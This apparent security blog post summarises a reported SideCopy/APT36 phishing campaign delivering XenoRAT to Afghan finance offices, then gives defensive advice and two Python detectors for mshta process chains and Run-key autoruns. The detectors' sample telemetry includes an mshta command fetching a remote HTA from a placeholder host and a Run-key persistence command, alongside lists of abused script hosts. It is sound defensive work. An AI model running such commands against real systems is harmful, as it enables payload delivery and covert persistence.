SideCopy’s XenoRAT Campaign Shows Why Localized Lures Beat Generic Phishing Defenses


SideCopy’s latest Afghanistan-focused campaign is a useful reminder that targeted phishing does not have to be technically exotic at the first click. The sophistication is in the preparation: language, local context, believable administrative documents, and a payload chain built to survive long enough for hands-on-keyboard access.

According to reporting from GBHackers, based on Seqrite Labs research, the Pakistan-linked SideCopy cluster, associated with Transparent Tribe/APT36, targeted Afghanistan’s Ministry of Finance and provincial revenue directorates with a Pashto-language lure. The infection chain led to a customized XenoRAT implant with persistence, in-memory execution, AMSI bypass behavior, and encrypted command-and-control traffic.

What happened

The campaign began with a ZIP archive containing a malicious Windows shortcut file disguised as a PDF. The filename referenced employees introduced to an “intellectual and psychological warfare seminar,” a lure that makes sense for the target environment instead of relying on a generic invoice, resume, or policy update.

Once opened, the shortcut abused mshta.exe to retrieve a remote HTA payload from a compromised Afghan education domain. Follow-on stages used obfuscated JavaScript, .NET loaders, registry persistence masquerading as an Edge-related entry, and reflective execution before delivering XenoRAT 1.8.7.

The decoy document reportedly contained a detailed provincial Ministry of Finance staff directory covering all 34 Afghan provinces, including names, roles, and mobile numbers. That matters because it suggests the operator conducted reconnaissance before delivery and shaped the lure around real internal context.

Why it matters

For small businesses, local governments, nonprofits, and government contractors, the lesson is not limited to Afghanistan or APT36. This is the pattern defenders should care about:

  • Localized lures beat generic awareness training. A phishing email written in the right language with believable internal subject matter can bypass the “spot the typo” model of user training.
  • LOLBIN abuse still works. Tools like mshta.exe, script interpreters, and trusted Windows components remain useful to attackers because many environments do not restrict them tightly.
  • RAT payloads are operational access, not just malware. XenoRAT capabilities such as keylogging, screen capture, webcam access, SOCKS tunneling, and remote command execution can turn one workstation into a persistent intelligence collection point.
  • Compromised legitimate domains reduce suspicion. Hosting early-stage payloads on regionally relevant infrastructure makes network indicators harder to dismiss as obviously malicious.

Defensive takeaways

1. Restrict high-risk script execution

If your users do not need HTA execution, restrict or monitor mshta.exe. The same goes for other common living-off-the-land execution paths such as wscript.exe, cscript.exe, rundll32.exe, and PowerShell child processes launched from document-opening workflows.

2. Alert on suspicious parent-child chains

A shortcut file launching mshta.exe, followed by script execution, registry writes, public-folder staging, or outbound connections should be high-signal. Even if each event looks ordinary alone, the chain is not normal office behavior.
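One way to turn the chain above into a scored detection, written as an added example for this write-up rather than code from the original post or from the Seqrite report. It walks Sysmon-style process-creation events, builds a parent/child tree, and scores every `mshta.exe` process on what it loaded and what it spawned. The events are constructed; the field names (`pid`, `ppid`, `image`, `cmdline`), the placeholder domain, the paths and the weights are all assumptions.

```python
"""Score explorer -> mshta.exe -> script host -> registry chains in process telemetry.

Added example for this write-up; not code from the original post or the Seqrite
report. Events are constructed, Sysmon-Event-ID-1-style records; the field names,
the placeholder domain, the paths and the scoring weights are assumptions.
"""
import ntpath
import re
from collections import defaultdict

# Constructed sample telemetry. pids 300-302 mirror the chain the write-up
# describes (a shortcut launches mshta with a remote HTA, which spawns a script
# host that writes a Run key); pid 400 is mshta opening a local vendor help file.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r'"WINWORD.EXE" /n "C:\Users\a\Documents\budget.docx"'},
    {"pid": 300, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://compromised-site.example/seminar.hta"},
    {"pid": 301, "ppid": 300, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Users\Public\stage.js"},
    {"pid": 302, "ppid": 301, "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v EdgeUpdater /d C:\Users\Public\loader.exe"},
    {"pid": 400, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Program Files\Vendor\help.hta"},
]

# Script hosts and LOLBINs that are rarely legitimate children of mshta.exe.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "rundll32.exe", "regsvr32.exe"}
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)          # HTA fetched over the network
RUN_KEY = re.compile(r"\\CurrentVersion\\Run", re.IGNORECASE)  # autorun persistence write
STAGING_DIRS = re.compile(r"\\Users\\Public\\|\\AppData\\Local\\Temp\\|\\ProgramData\\", re.IGNORECASE)


def build_tree(events):
    """Map each parent pid to the list of its direct child events."""
    children = defaultdict(list)
    for ev in events:
        children[ev["ppid"]].append(ev)
    return children


def descendants(children, pid):
    """Return every process below pid in the tree (depth-first)."""
    stack, out = list(children.get(pid, [])), []
    while stack:
        ev = stack.pop()
        out.append(ev)
        stack.extend(children.get(ev["pid"], []))
    return out


def score_chain(root, descs):
    """Weight the signals the write-up calls out; weights are illustrative."""
    score, reasons = 0, []
    if REMOTE_URL.search(root["cmdline"]):
        score += 3
        reasons.append("mshta.exe fetched a remote HTA")
    for ev in descs:
        name = ntpath.basename(ev["image"]).lower()
        if name in SCRIPT_HOSTS:
            score += 2
            reasons.append(f"mshta.exe chain spawned script host {name}")
        if RUN_KEY.search(ev["cmdline"]):
            score += 2
            reasons.append("Run-key write inside the chain")
        if STAGING_DIRS.search(ev["cmdline"]):
            score += 1
            reasons.append("user-writable staging path referenced")
    return score, reasons


def analyze(events, threshold=5):
    """Score every mshta.exe process; return {pid: {score, alert, reasons}}."""
    children = build_tree(events)
    results = {}
    for ev in events:
        if ntpath.basename(ev["image"]).lower() != "mshta.exe":
            continue
        score, reasons = score_chain(ev, descendants(children, ev["pid"]))
        results[ev["pid"]] = {"score": score, "alert": score >= threshold, "reasons": reasons}
    return results


if __name__ == "__main__":
    for pid, r in analyze(EVENTS).items():
        print(pid, "ALERT" if r["alert"] else "ok", r["score"], r["reasons"])
```

Run against the constructed events, the remote-HTA chain (pid 300) scores 9 and alerts, while the local help-file launch (pid 400) scores 0. In practice the events come from Sysmon Event ID 1 or your EDR's process-create stream, and the weights should be tuned against a few weeks of your own baseline before the rule pages anyone.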

3. Treat local-language phishing as a control problem

Awareness training should include examples that match the organization’s actual language, departments, partners, and workflow. A finance office should see finance-themed lures. A contractor should see procurement, onboarding, subcontractor, and portal-themed lures.

4. Monitor persistence in user-writable paths

This campaign used public/user-accessible directories and registry run keys for persistence. Baseline and alert on new autoruns, especially entries with misspellings or typosquatting names designed to resemble legitimate software.
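A baseline-and-diff check for Run-key autoruns, added here as an example and not taken from the original post. It compares a saved snapshot against the current one, flags new or changed entries whose image lives under `C:\Users\Public`, `C:\ProgramData` or a user profile, and uses a similarity ratio to catch names that are one letter away from a well-known vendor entry. The two snapshots, the list of known vendor names and the scoring weights are constructed assumptions standing in for an Autoruns or registry export.

```python
"""Diff Run-key autoruns against a baseline and flag entries in user-writable paths.

Added example for this write-up, not code from the original post. BASELINE and
CURRENT are constructed name -> image-path snapshots; KNOWN_NAMES and the weights
are assumptions.
"""
import difflib
import re

# Constructed snapshots (e.g. exported from HKCU\...\CurrentVersion\Run).
BASELINE = {
    "OneDrive": r"C:\Users\a\AppData\Local\Microsoft\OneDrive\OneDrive.exe",
    "SecurityHealth": r"C:\Windows\System32\SecurityHealthSystray.exe",
}
CURRENT = {
    "OneDrive": r"C:\Users\a\AppData\Local\Microsoft\OneDrive\OneDrive.exe",
    "SecurityHealth": r"C:\ProgramData\Health\SecurityHealthSystray.exe",   # path moved
    "MicrosftEdgeAutoLaunch": r"C:\Users\Public\Libraries\edge.exe",       # typosquat, public dir
    "Zoom": r"C:\Users\a\AppData\Roaming\Zoom\bin\Zoom.exe",                # ordinary per-user app
}

# Assumed list of legitimate autorun names to compare against.
KNOWN_NAMES = ["MicrosoftEdgeAutoLaunch", "OneDrive", "SecurityHealth", "GoogleUpdate"]

PUBLIC_OR_PROGRAMDATA = re.compile(r"^[A-Z]:\\(Users\\Public\\|ProgramData\\)", re.IGNORECASE)
USER_PROFILE = re.compile(r"^[A-Z]:\\Users\\", re.IGNORECASE)


def looks_like_typosquat(name, known=KNOWN_NAMES, cutoff=0.8):
    """True when name is close to, but not identical to, a known vendor entry."""
    n = name.lower()
    lowered = [k.lower() for k in known]
    if n in lowered:
        return False
    return any(difflib.SequenceMatcher(None, n, k).ratio() >= cutoff for k in lowered)


def score_entry(name, path, previous_path=None):
    """Score one new or changed entry; weights are illustrative."""
    score, reasons = 0, []
    if previous_path is not None:
        score += 2
        reasons.append(f"image path changed from {previous_path}")
    if PUBLIC_OR_PROGRAMDATA.match(path):
        score += 2
        reasons.append("image under Public or ProgramData")
    elif USER_PROFILE.match(path):
        score += 1
        reasons.append("image under a user profile")
    if looks_like_typosquat(name):
        score += 2
        reasons.append("name resembles a known vendor entry")
    return score, reasons


def diff_autoruns(baseline, current, threshold=3):
    """Return findings for entries that are new, changed or removed since baseline."""
    findings = []
    for name, path in current.items():
        if name not in baseline:
            score, reasons = score_entry(name, path)
            findings.append({"name": name, "path": path, "change": "new",
                             "score": score, "alert": score >= threshold, "reasons": reasons})
        elif baseline[name] != path:
            score, reasons = score_entry(name, path, previous_path=baseline[name])
            findings.append({"name": name, "path": path, "change": "changed",
                             "score": score, "alert": score >= threshold, "reasons": reasons})
    for name in baseline.keys() - current.keys():
        findings.append({"name": name, "path": baseline[name], "change": "removed",
                         "score": 0, "alert": False, "reasons": ["entry removed"]})
    return findings


if __name__ == "__main__":
    for f in diff_autoruns(BASELINE, CURRENT):
        print(f["change"], f["name"], "ALERT" if f["alert"] else "ok", f["reasons"])
```

On the constructed data the misspelled Edge entry under `C:\Users\Public` and the relocated SecurityHealth entry both alert, while the new Zoom entry in a user profile is reported but stays below the threshold. The ratio check is deliberately loose; pair it with a hash or signer check on the image before escalating.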

5. Hunt for RAT behaviors, not only known hashes

Hashes change quickly. Defenders should also hunt for screen capture activity, unexpected SOCKS tunneling, unusual encrypted TCP sessions, access to browser credential stores, and remote-control tooling from endpoints that should not perform those actions.

Bulwark Black assessment

SideCopy’s XenoRAT campaign shows how public-sector targeting increasingly blends old and new tradecraft: simple phishing delivery, strong local context, trusted Windows binaries, fileless execution, and commodity/custom RAT capabilities. The initial file may be mundane, but the operational outcome is serious: persistent access inside government finance workflows.

For SMBs and government contractors, the practical move is to reduce execution paths before the lure lands. Block risky script handlers where possible, tune EDR around process chains, harden endpoint autoruns, and make phishing simulations look like the real business context attackers would study.

Original reporting: GBHackers — SideCopy Deploys Persistent XenoRAT Against Afghanistan Finance Ministry. Primary technical analysis: Seqrite Labs — Operation XENOFISCAL.
